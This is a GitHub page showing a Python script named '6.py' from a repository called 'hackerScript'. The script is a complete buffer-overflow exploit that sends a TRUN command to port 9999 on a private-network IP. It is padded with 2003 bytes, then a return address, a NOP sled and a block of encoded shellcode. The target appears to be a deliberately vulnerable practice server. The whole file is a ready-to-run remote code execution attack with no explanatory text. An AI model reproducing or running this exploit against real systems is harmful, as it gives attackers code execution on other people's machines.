hackerScript/6.py at main · userIssa/hackerScript · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/python3
import sys, socket


overflow = (
b"\xbf\x6d\x13\xe4\xe1\xd9\xce\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
b"\x52\x31\x7a\x12\x83\xea\xfc\x03\x17\x1d\x06\x14\x1b\xc9\x44"
b"\xd7\xe3\x0a\x29\x51\x06\x3b\x69\x05\x43\x6c\x59\x4d\x01\x81"
b"\x12\x03\xb1\x12\x56\x8c\xb6\x93\xdd\xea\xf9\x24\x4d\xce\x98"
b"\xa6\x8c\x03\x7a\x96\x5e\x56\x7b\xdf\x83\x9b\x29\x88\xc8\x0e"
b"\xdd\xbd\x85\x92\x56\x8d\x08\x93\x8b\x46\x2a\xb2\x1a\xdc\x75"
b"\x14\x9d\x31\x0e\x1d\x85\x56\x2b\xd7\x3e\xac\xc7\xe6\x96\xfc"
b"\x28\x44\xd7\x30\xdb\x94\x10\xf6\x04\xe3\x68\x04\xb8\xf4\xaf"
b"\x76\x66\x70\x2b\xd0\xed\x22\x97\xe0\x22\xb4\x5c\xee\x8f\xb2"
b"\x3a\xf3\x0e\x16\x31\x0f\x9a\x99\x95\x99\xd8\xbd\x31\xc1\xbb"
b"\xdc\x60\xaf\x6a\xe0\x72\x10\xd2\x44\xf9\xbd\x07\xf5\xa0\xa9"
b"\xe4\x34\x5a\x2a\x63\x4e\x29\x18\x2c\xe4\xa5\x10\xa5\x22\x32"
b"\x56\x9c\x93\xac\xa9\x1f\xe4\xe5\x6d\x4b\xb4\x9d\x44\xf4\x5f"
b"\x5d\x68\x21\xcf\x0d\xc6\x9a\xb0\xfd\xa6\x4a\x59\x17\x29\xb4"
b"\x79\x18\xe3\xdd\x10\xe3\x64\x22\x4c\xe1\xf4\xca\x8f\xf5\xe5"
b"\x56\x19\x13\x6f\x77\x4f\x8c\x18\xee\xca\x46\xb8\xef\xc0\x23"
b"\xfa\x64\xe7\xd4\xb5\x8c\x82\xc6\x22\x7d\xd9\xb4\xe5\x82\xf7"
b"\xd0\x6a\x10\x9c\x20\xe4\x09\x0b\x77\xa1\xfc\x42\x1d\x5f\xa6"
b"\xfc\x03\xa2\x3e\xc6\x87\x79\x83\xc9\x06\x0f\xbf\xed\x18\xc9"
b"\x40\xaa\x4c\x85\x16\x64\x3a\x63\xc1\xc6\x94\x3d\xbe\x80\x70"
b"\xbb\x8c\x12\x06\xc4\xd8\xe4\xe6\x75\xb5\xb0\x19\xb9\x51\x35"
b"\x62\xa7\xc1\xba\xb9\x63\xe1\x58\x6b\x9e\x8a\xc4\xfe\x23\xd7"
b"\xf6\xd5\x60\xee\x74\xdf\x18\x15\x64\xaa\x1d\x51\x22\x47\x6c"
b"\xca\xc7\x67\xc3\xeb\xcd"
)


shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.10.130',9999))

	payload = b'TRUN /.:/' + shellcode

	s.send((payload))
	s.close()


except:
	print ("Error connectiong to server")
	sys.exit()